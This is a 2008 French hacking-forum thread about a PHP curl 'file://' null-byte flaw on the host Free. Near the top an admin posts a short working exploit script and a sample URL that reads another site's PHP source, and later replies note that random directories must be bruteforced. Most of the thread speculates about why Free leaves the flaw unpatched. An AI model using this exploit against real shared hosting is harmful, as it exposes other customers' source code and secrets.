Faille Curl Free

Moderator: Mod

Faille Curl Free

Postby Korigan » Wed Mar 26, 2008 8:17 pm

Voilà,
Nous venons d'aborder le sujet de la faille curl sur le chat. (dixit shp)
Et afin de confirmer ou d'infirmer la nouvelle j'ai voulu tester.

Donc voilà,
Après un petit tour sur securityreason.com
Voici l'exploit:

[code:1:b0bd108074]<?
$ch =
curl_init("file://".$_GET['url']."\x00".
__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
[/code:1:b0bd108074]

Et voici l'url donné en argument:

[code:1:b0bd108074]
http://where.is.free.fr/free.php?url=/mnt/156/sdb/e/3/where.is/index.php
[/code:1:b0bd108074]

Je n'en dis pas plus, à vous de tester et d'approfondir si le coeur vous en dis.

Ce n'est pas une raison pour abandonner free car nous n'utilisons pas forcemment curl.

La vrai raison qui doit nous pousser à abandonner free est qu'ils refuse de corriger la faille (dixit shp)

++Korigan

Ps: Je viens de supprimer le fichier, inutile d'essayer sur where.is ^^
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby shp » Wed Mar 26, 2008 8:20 pm

Je confirme que la faille est belle et bien présente, et qu'on peut avoir accès au code source php de n'importe quel fichier d'un site free si on détient un accès local php sur le serveur.
Et pour ne pas le citer, c'est mosquitox qui m'en a parlé ;)
shp
Projets
 
Posts: 82
Joined: Thu Jan 10, 2008 9:57 pm
Location: sud ouest

Postby Manu404 » Wed Mar 26, 2008 10:10 pm

l me semble que c'est assez vieux comme exploit non?
[quote:616d908fc1]La vrai raison qui doit nous pousser à abandonner free est qu'ils refuse de corriger la faille (dixit shp) [/quote:616d908fc1]
+1
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby baltazare » Thu Mar 27, 2008 11:37 am

La vrai question est "pourquoi il ne corrige pas".
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby Manu404 » Thu Mar 27, 2008 12:36 pm

Sa leurs permet peut être de justifer certaines erreurs invoulues de leurs part en utilisant cette failles comme excuse ?
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby baltazare » Thu Mar 27, 2008 12:51 pm

Bingo :wink:
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby Manu404 » Thu Mar 27, 2008 12:52 pm

Merci Cretin.fr lol
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby baltazare » Thu Mar 27, 2008 12:53 pm

cretin.fr?
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby Manu404 » Thu Mar 27, 2008 12:55 pm

C'est a dire que c'est franchemnt debile de laisser une fialles aussi grosse pour ecuser d'autre failles, il ferait mieux de regler celle et d'en laisser un plus petite moins exploitable...
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby baltazare » Thu Mar 27, 2008 12:59 pm

Malheuresement ce n'est pas possible, les employés de free ont un cahier des charges qu'ils doivent respecté.
Si le boss dit non, c'est non...
C'est pas comme dans une PME où tes actions et manoeuvres sont plus larges.

J'edite pour dire que il n'y a pas seulement chez Free...j'ai toruver une faille dans une grosse boite francaise... il y a moyen de faire du hack lucratif, et leur filliale reseau ne veulent pas toucher à sa.
J'ai meme eu un avertissement alors que je les avait prevenu...

Ils sont peut etre con, mais si ils le font, c'est que y'a du lourd derriere.
Les capitalistes ne jouent pas trop avec leur pognons...
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby Manu404 » Thu Mar 27, 2008 1:14 pm

CAPITALISTA !!!
VIVA LA REVOLUZIONE !
lol

Mais sa je n'en doute pas mais jsutement ce genre failles vont a l'encontre de elurs interets non?
Je ne comprend pas comment une failles qui leurs feraieet perdre de l'argents les aideraient...
Détournements de fonds? Blanchissage d'argent??
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby baltazare » Thu Mar 27, 2008 1:34 pm

Avec mes données recoltées et un groupe d'organisateur, un "casse" informatique peut facilement avoir lieu.
Et ils le savent, donc ces à double tranchent pour eux.

Le vrai "pourquoi" on ne le saura peut etre jamais, à moins que sa se decouvre et qu'on le voit au JT de 20h :lol: "à cause ou grace" à un fouille merde, journaliste. (pleonasme?! :? )

J'aimerai bien avoir l'avis de tout le monde, sa serait interessant tiens.
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby str4k3 » Sat Apr 05, 2008 6:19 pm

moi il y a un beug quand je met

http://monsite.free.fr/free.php?url=/mnt/156/sdb/e/3/autresite/index.php

il ne veut pas m ouvrir index.php

sinn en local sa marche tres bien
User avatar
str4k3
Projets
 
Posts: 9
Joined: Tue Nov 20, 2007 5:02 pm

Postby shp » Sun Apr 06, 2008 4:44 pm

c'est normal sur free, il y a 2 répertoires de 1 lettre alphanumérique qui sont aléatoires. Il faut donc bruteforcer.
[size=18:8cb7ef3349][color=red:8cb7ef3349]Je prierais cependant à ne pas mettre l'exploit avec le bruteforce ici en raison des différents scripts kiddies qui pourraient en avoir une utilisation illégale.[/color:8cb7ef3349][/size:8cb7ef3349]
shp
Projets
 
Posts: 82
Joined: Thu Jan 10, 2008 9:57 pm
Location: sud ouest

??

Postby DM5087 » Wed Apr 16, 2008 11:12 pm

faille réglé chez free ou pas ?
DM5087
Projets
 
Posts: 42
Joined: Thu Aug 16, 2007 10:02 pm
Location: ta pas ? savoir

Next

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 0 guests

cron